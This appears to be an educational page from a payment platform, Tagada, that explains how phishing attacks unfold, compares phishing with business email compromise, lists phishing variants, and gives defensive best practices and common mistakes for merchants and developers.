How Phishing Works
Phishing attacks follow a predictable kill chain, but execution sophistication varies enormously — from mass-blasted, typo-ridden emails to meticulously crafted campaigns that fool security professionals. Understanding the mechanics helps merchants and developers build defenses at each step rather than relying on a single control.
Attacker selects a lure and target
The attacker chooses a trusted brand to impersonate — a payment processor, shipping carrier, bank, or the merchant's own domain — and identifies targets through data broker lists, LinkedIn scraping, or prior breach databases. High-value targets such as finance managers or platform administrators receive personalized lures referencing real context.
Infrastructure is staged
A lookalike domain (e.g. paypa1.com, secure-stripe-login.com) is registered, often just hours before the campaign launches. An SSL certificate is obtained — giving the fake site a padlock icon that many users mistakenly equate with legitimacy. Hosting and email relays are set up in jurisdictions with limited enforcement cooperation.
Message is delivered
The phishing message arrives via email, SMS (smishing), voice call (vishing), or in-app notification. It creates urgency — "Your account will be suspended in 24 hours", "Verify your payout details now" — and includes a link or attachment. Legitimate-looking headers, logos, and formatting lower recipient suspicion.
Victim interacts with the payload
The victim clicks the link and lands on a cloned login page or a malware-delivering document. Credentials, card numbers, or one-time codes entered on the fake page are captured in real time. Some kits use reverse proxies to relay the session transparently, defeating SMS-based two-factor authentication.
Credentials are monetized
Stolen data is immediately tested against real platforms (credential stuffing) or sold in bulk on dark-web markets. In payment contexts this means unauthorized purchases, fraudulent fund transfers, account takeover, or resale of card data for card-not-present fraud. The window between credential capture and first fraudulent transaction is often under 15 minutes.
Why Phishing Matters
Phishing is not a niche threat — it is the dominant initial access vector for both consumer fraud and enterprise breaches. For payment businesses, the stakes are compounded by regulatory obligations, chargeback liability, and reputational damage when customers see their payment provider's brand used in an attack.
The FBI's Internet Crime Complaint Center (IC3) consistently ranks phishing as the most reported cybercrime category. In its 2023 report, phishing accounted for over 298,000 complaints in the United States alone, with adjusted losses exceeding $18.7 million attributed directly to credential-phishing schemes. When downstream fraud (account takeover, BEC, fraudulent transfers) is included, the total economic impact runs into the billions annually.
Verizon's 2024 Data Breach Investigations Report found that phishing was involved in 14% of all breaches analyzed globally, making it the second-most common attack pattern after stolen credential use — categories that are themselves tightly coupled, since phishing is the primary source of those stolen credentials. For the financial services and retail verticals specifically, phishing and social engineering together account for the majority of confirmed data disclosure events.
Payment-specific exposure
Merchants are targeted not only as victims but as infrastructure. Fraudsters register domains that spoof your checkout or support portal to phish your customers — damage that falls on your brand even when your own systems are never breached.
Phishing vs. Business Email Compromise
Phishing and Business Email Compromise are closely related but operate at different layers of sophistication and target different outcomes.
| Dimension | Phishing | Business Email Compromise (BEC) |
|---|---|---|
| Primary goal | Steal credentials or card data at scale | Redirect payments or authorize fraudulent transfers |
| Targeting | Broad (mass) or semi-targeted | Highly targeted (executives, finance, AP teams) |
| Delivery | Fake links, attachments, cloned pages | Compromised or spoofed email thread hijacking |
| Technical complexity | Low to medium | Medium to high |
| Average loss per incident | Lower (individual account) | Very high ($137,000+ median per FBI IC3 2023) |
| Detection signal | Suspicious URL, sender domain mismatch | Subtle thread context, account number change |
| Primary defense | MFA, URL filtering, security awareness | Out-of-band payment verification, strict approval workflows |
Both attacks exploit trust — phishing exploits brand trust, BEC exploits organizational trust. Defenses should address both layers.
Types of Phishing
Phishing is not a single technique. Attackers adapt the channel and targeting to maximize their success rate against specific victim profiles, including ecommerce shoppers, payment platform users, and merchant back-office staff.
Deceptive phishing is the classic variant: bulk emails impersonating a well-known brand with a malicious link. Volume compensates for low click rates.
Spear phishing is personalized using open-source intelligence. Messages reference the victim's employer, role, recent transactions, or colleagues. Click rates are dramatically higher than bulk campaigns.
Smishing (SMS phishing) exploits the high open rates of text messages. Fake delivery notifications ("Your parcel is held — verify your address") are common in ecommerce contexts and often harvest card details under the guise of re-delivery fees.
Vishing (voice phishing) uses phone calls, often with spoofed caller ID, to impersonate bank fraud departments or payment processors and extract OTPs or card verification codes in real time.
Pharming compromises DNS resolution to redirect legitimate domain requests to attacker-controlled servers, bypassing the need to trick users into clicking a link at all.
Adversary-in-the-Middle (AiTM) phishing uses a reverse proxy to relay authentication sessions in real time, capturing session cookies after MFA completion and defeating SMS and TOTP-based two-factor controls.
Best Practices
Technical controls and human training are both necessary. Phishing succeeds when either layer is absent.
For Merchants
Publish and enforce a strict DMARC policy (p=reject) alongside SPF and DKIM records for every domain you own, including dormant ones. Attackers frequently abuse unused subdomains and parked domains that have no email authentication policy.
Monitor certificate transparency logs for lookalike domains (e.g. yourstore-support.com, yourstore-payments.com) using free services or commercial brand protection tools. Early detection allows you to report and take down phishing infrastructure before campaigns launch.
Enforce phishing-resistant MFA — FIDO2/passkeys or hardware security keys — on your payment dashboard, admin portal, and any system with access to settlement accounts. SMS OTP is insufficient against AiTM kits.
Train staff on payment change requests: any request to update a bank account number, payout destination, or supplier payment detail should require out-of-band verbal confirmation with a known contact, regardless of how legitimate the email appears.
Subscribe to takedown services or work with your payment provider to have phishing pages impersonating your brand removed quickly. Speed matters — the median phishing page is live for under 24 hours.
For Developers
Implement Content Security Policy (CSP) headers to limit what can be injected into your checkout pages, reducing the value of compromising your domain for hosting phishing content.
Use subresource integrity (SRI) checks on third-party scripts loaded in checkout flows. Compromised CDN scripts are a supply-chain phishing vector targeting payment pages specifically.
Log and alert on unusual admin activity: new API key creation, changes to webhook endpoints, and payout account updates should trigger immediate review. These actions are the downstream goal of credential phishing targeting your platform.
Build anomaly detection into authentication flows: impossible travel, new device + new IP + high-value action in the same session, and rapid credential validation attempts are all phishing-correlated signals worth surfacing to your fraud operations team.
Consider integrating identity fraud checks at account creation and payment method addition to catch compromised identities before they complete transactions.
Common Mistakes
Even security-conscious teams make predictable errors when addressing phishing risk.
Treating security awareness training as a one-time event. Annual phishing simulations produce compliance metrics, not behavioral change. Effective programs run frequent, varied simulations with immediate feedback and track improvement over time.
Conflating a padlock icon with safety. A large proportion of phishing sites now use HTTPS. Communicating to customers and staff that "look for the padlock" is sufficient guidance actively increases vulnerability, because attackers routinely obtain valid TLS certificates for their lookalike domains.
Stopping at email. Phishing now arrives via SMS, voice, social media DMs, QR codes, and even in-app messaging. Defenses focused exclusively on email filtering miss the majority of modern attack surface.
Relying solely on SMS OTP for MFA. Reverse-proxy phishing kits defeat SMS-based two-factor authentication in real time. Upgrading to FIDO2 / passkeys on high-value actions is the only technical control that eliminates this risk at the authentication layer.
Failing to monitor for brand abuse. Merchants often only discover that their domain or logo is being used in phishing campaigns when customers complain. Proactive monitoring and takedown reduces the window of exposure and the associated chargeback and reputational risk.
Phishing and Tagada
Tagada is a payment orchestration platform — your payment dashboard, webhook configurations, and settlement account details are high-value phishing targets for attackers seeking to redirect merchant payouts or compromise customer payment data.
Protect your Tagada account
Enable passkey or hardware security key authentication on your Tagada portal. Any change to payout bank accounts or webhook endpoints triggers a review notification — treat unexpected notifications as a potential indicator of compromise and verify out-of-band before approving. If you suspect your credentials have been phished, contact Tagada support immediately to freeze API keys and audit recent configuration changes.
Tagada's platform logs all administrative actions with timestamps and IP addresses. If your team receives a suspicious email appearing to come from Tagada requesting credential re-verification or payment detail updates, do not click any links — Tagada will never ask for your password or full card details via email. Report suspected impersonation of the Tagada brand to your account manager so the phishing infrastructure can be identified and reported for takedown. Connecting account takeover prevention controls at the orchestration layer — such as IP allowlisting for API access and webhook signature verification — adds defense-in-depth that limits the blast radius if credentials are ever compromised through a phishing attack.